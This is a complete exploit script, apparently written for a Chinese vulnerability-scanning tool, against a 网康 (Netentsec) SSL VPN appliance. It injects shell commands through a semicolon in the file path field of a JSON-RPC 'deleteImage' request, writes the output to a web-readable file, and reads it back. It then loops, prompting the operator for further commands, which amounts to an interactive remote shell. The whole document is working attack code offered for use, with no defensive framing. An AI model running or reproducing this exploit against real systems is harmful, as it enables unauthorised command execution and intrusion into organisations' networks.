#define payload = {"action": "SSLVPN_Resource", "method": "deleteImage", "data": [{"data": ["/var/www/html/d.txt;wwwwww > /var/www/html/1.txt"]}], "type": "rpc", "tid": 17}
#define bug = ":{"success":true
function exec(url,cmd){
	res = HttpPost(url."/directdata/direct/router",StrReplace(payload,"wwwwww",cmd),"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36".StrRN()."X-Requested-With: XMLHttpRequest");
	if(StrFindStr(res[0],bug,0) != "-1"){
		r = HttpGet(url."/1.txt","User-Agent: Mozilla/5.0");
		return r[0];
	}else{
		return "";
	}
}
function main(args){
	print("请输入网康网址:");
	url = input();
	try{
		print("请输入执行的命令[exit退出]:");cmd = input();
			while(cmd != "exit"){
				r = exec(url,cmd);
				if(r != ""){
					printclolor(r,3);
				}
				print("请输入执行的命令[exit退出]:");cmd = input();
			}
	}catch{
		printclolor(url."请求出错！",1);
	}
}